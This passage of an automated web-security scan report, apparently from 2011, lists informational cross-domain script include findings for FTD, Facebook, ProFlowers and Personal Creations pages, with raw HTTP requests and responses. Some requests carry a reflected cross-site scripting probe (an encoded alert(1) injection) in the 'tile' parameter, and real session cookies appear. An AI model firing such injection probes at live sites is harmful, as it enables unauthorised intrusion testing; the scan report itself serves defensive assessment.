    <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</center>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

17.24. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a5dfe874%26origin%3Dhttp%253A%252F%252Fwww.ftd.com%252Ff1fcffb74%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2FFTDFlowers&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.137.43.128
X-Cnection: close
Date: Mon, 09 May 2011 01:00:37 GMT
Content-Length: 8755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.25. http://www.ftd.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:00:16 GMT
X-Varnish: 729964464 729931173
Age: 611
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 134998


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
    <script type="text/javascript" src="http://www.ftdimg.com/v20110407/js/compressed-jcarousel.js"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://www.ftdimg.com/js/tealeaf.js"></script>
<script type="text/javascript" src="http://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-alive.js"></script>
...[SNIP]...
<!-- MyBuys setup files -->
<script type="text/javascript" src="http://www.ftdimg.com/pics/foresee/11-04-17-13-12/mybuys3.js"></script>
<script type="text/javascript" src="http://www.ftdimg.com/pics/foresee/11-04-17-13-12/mybuys-setup.js"></script>
...[SNIP]...
<!-- Start Pixel code for netmining_pixel -->
<script src="https://ftd.netmng.com/?aid=181" type="text/javascript" defer="defer"></script>
...[SNIP]...
<!-- printing out our omniture js file shared by both dev and production -->
<script language="JavaScript" src="http://www.ftdimg.com/js/omniture.js"></script>
...[SNIP]...

17.26. http://www.personalcreations.com/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.personalcreations.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=wz0kwfor3fvne2lfjnllwoah; domain=personalcreations.com; path=/
Set-Cookie: ASP.NET_SessionId=wz0kwfor3fvne2lfjnllwoah; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PCR=TestAssignmentValues=nta-1,ttb-3,nte-3,ntc-2,tpr-1,ntb-1,xta-1,tpp-4,tbc-2,ntd-1,xtc-1,tmm-1,xtb-1,trr-2,tvo-1,tpf-1; domain=.personalcreations.com; expires=Sat, 09-Jun-2012 12:23:17 GMT; path=/
Set-Cookie: ENDOFDAY_PCR=TestAssignmentValues=,txb-1,tkt-2,thp-2,txa-2,tks-1,txc-1,mpsmediapersonalitysplit-2; domain=.personalcreations.com; expires=Tue, 10-May-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_PCR=TestConfigDateTimeUpdated=5/9/2011 5:23:17 AM; domain=.personalcreations.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=5; domain=.personalcreations.com; expires=Thu, 12-May-2011 12:23:17 GMT; path=/
Set-Cookie: PCR_BrowserId=7e39bf7a-035a-482a-a5ba-f1400b3f220a; domain=.personalcreations.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PCR_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.personalcreations.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:23:19 GMT
Content-Length: 120465


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/st
...[SNIP]...
<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="outerContainer">
               

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="TopNav"> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/common_pcr.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="heroElements">
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery.cycle.all.latest.min.js"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
</span>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

17.27. http://www.proflowers.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=vdbbjo2ye2hg5x4cildhrv3t; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=vdbbjo2ye2hg5x4cildhrv3t; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-2,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-7,nte-3,phl-2,ppv-3,phr-1,nta-1,xpc-1,ntb-1,pnp-1,ppr-1,pmm-2,pem-1,pfe-3,pml-0; domain=.proflowers.com; expires=Sat, 09-Jun-2012 12:07:41 GMT; path=/
Set-Cookie: ENDOFDAY_PFC=TestAssignmentValues=,pxc-3,mpsmediapersonalitysplit-1,zzd-1,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; domain=.proflowers.com; expires=Tue, 10-May-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:41 AM; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=50; domain=.proflowers.com; expires=Thu, 12-May-2011 12:07:41 GMT; path=/
Set-Cookie: PFC_BrowserId=92c68dc8-4b77-41de-89a7-78ac8cdfbbd3; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:07:40 GMT
Content-Length: 88497


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
<meta name="msvalidate.01" content="77940E049C181974C3AA656C72688B4C" />


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="topMain" class="clearfix">
       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery.cycle.all.latest.min.js"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
e is prohibited.
   * This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
   * http://www.opinionlab.com
-->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<!--ooend-->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
</span>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

17.28. http://www.proflowers.com/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.proflowers.com%25252Fdefault.aspx%25253Ftile%25253Dhmpg_hero16c36a%2525255c%25252522%2525253balert(1)%2525252f%2525252fdecb137eb0b%252526Ref%25253DHo%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:17:43 GMT
Content-Length: 95799


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
<meta name="msvalidate.01" content="77940E049C181974C3AA656C72688B4C" />


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="topMain" class="clearfix">
       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery.cycle.all.latest.min.js"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
e is prohibited.
   * This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
   * http://www.opinionlab.com
-->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<!--ooend-->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
</span>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

17.29. http://www.proflowers.com/house-plants-PBS

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /house-plants-PBS

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.proflowers.com%25252Fhouse-plants-PBS%25253Ftile%25253Dhmpg_podA%252526Ref%25253DHomeNoRef%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
